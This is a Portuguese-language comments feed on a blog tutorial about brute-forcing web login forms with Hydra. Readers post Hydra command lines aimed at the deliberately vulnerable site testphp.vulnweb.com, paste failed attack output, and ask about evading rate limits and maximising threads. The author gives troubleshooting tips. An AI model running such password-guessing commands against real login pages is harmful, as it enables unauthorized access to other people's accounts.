tag:blogger.com,1999:blog-3966805455488209540.post6752288821376232588..comments2024-03-05T10:14:26.756-08:00Comments on Nanoshots | Cloud & DevOps & Security: Realizando ataques de Força Bruta em formulários de Login com HydraMatheus Fidelishttp://www.blogger.com/profile/00562072739364145635noreply@blogger.comBlogger9125tag:blogger.com,1999:blog-3966805455488209540.post-2522743501578631712017-11-09T10:58:07.952-08:002017-11-09T10:58:07.952-08:00Muito complicado para mim , prefiro usar o Burpsui...Muito complicado para mim , prefiro usar o Burpsuite que já vem no Kali Linux !! Iandson Mendeshttps://www.blogger.com/profile/01015243593185481967noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-54269163865184192892017-06-30T07:02:27.356-07:002017-06-30T07:02:27.356-07:00o que eu faço quando o botão de login é uma imagem...o que eu faço quando o botão de login é uma imagem, e o "login page" nao funciona (da como todas as senhas sao validas) e quando eu coloco o erro de login do site "Usuário ou senha inválido." da como todas as senhas sao validas no terminalLucas Werneck Gonçalveshttps://www.blogger.com/profile/11190879127132387746noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-1608526154319154932017-06-30T07:00:24.835-07:002017-06-30T07:00:24.835-07:00Este comentário foi removido pelo autor.Lucas Werneck Gonçalveshttps://www.blogger.com/profile/11190879127132387746noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-51224286646135520602017-06-29T00:10:43.952-07:002017-06-29T00:10:43.952-07:00O que fazer quando o site possui rate limit?O que fazer quando o site possui rate limit?Capatihttps://www.blogger.com/profile/11475411460799254849noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-55348922702003003302017-04-03T16:57:38.195-07:002017-04-03T16:57:38.195-07:00bem explicativo ..........más se usar esse metodo ...bem explicativo ..........más se usar esse metodo onde fica salvo a a senha ou o admin? o hydra salva esse resultado onde?Anonymoushttps://www.blogger.com/profile/01281346718872082519noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-16312858299814146642016-07-27T12:17:28.349-07:002016-07-27T12:17:28.349-07:00Parabéns! Matheus, você poderia explicar o uso do ...Parabéns! Matheus, você poderia explicar o uso do "-t 10" e como poderíamos usar o máximo da máquina para efetuar o ataque? Anonymoushttps://www.blogger.com/profile/06363369747617781434noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-8459829119499882912015-10-28T17:05:52.273-07:002015-10-28T17:05:52.273-07:00Realmente o comando:
hydra testphp.vulnweb.com htt...Realmente o comando:<br />hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -P passlist.txt -t 10<br /><br />*com test sendo uma das senhas em passlist.txt<br /><br />ou até mesmo o:<br />hydra testphp.vulnweb.com http-form-post "/userinfo.php:uname=^USER^&pass=^PASS^:login page" -l test -p test -t 10<br /><br />Retorna 0 valid passwords found.<br /><br />Não consegui identificar a causa de não identificar o usuário test e senha test.Evaldo Wolkershttps://www.blogger.com/profile/01819786163280216715noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-36611497118527285842015-10-27T05:33:53.279-07:002015-10-27T05:33:53.279-07:00Tenha certeza de que você parametrizou corretament...Tenha certeza de que você parametrizou corretamente, do mesmo modo que a requisição é enviada. Na duvida, use o Burp Suite. Matheus Fidelishttps://www.blogger.com/profile/00562072739364145635noreply@blogger.comtag:blogger.com,1999:blog-3966805455488209540.post-25442753847995703972015-10-26T15:11:01.744-07:002015-10-26T15:11:01.744-07:00Ótimo post!
Pena que aqui não rolou
[ATTEMPT] ta...Ótimo post!<br /><br />Pena que aqui não rolou<br /><br />[ATTEMPT] target testphp.vulnweb.com - login "test" - pass "test" - 105 of 108 [child 1]<br />[ATTEMPT] target testphp.vulnweb.com - login "test" - pass "qwe123" - 106 of 108 [child 5]<br />[ATTEMPT] target testphp.vulnweb.com - login "test" - pass "qwe123456" - 107 of 108 [child 3]<br />[ATTEMPT] target testphp.vulnweb.com - login "test" - pass "test" - 108 of 108 [child 0]<br />[STATUS] 18.00 tries/min, 108 tries in 00:06h, 1 todo in 00:01h, 8 active<br />1 of 1 target completed, 0 valid passwords found<br />Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-26 20:04:45<br /><br />Coloquei até 2 vezes o test no passlist.txt e nada.G. H.https://www.blogger.com/profile/02200253124803481699noreply@blogger.com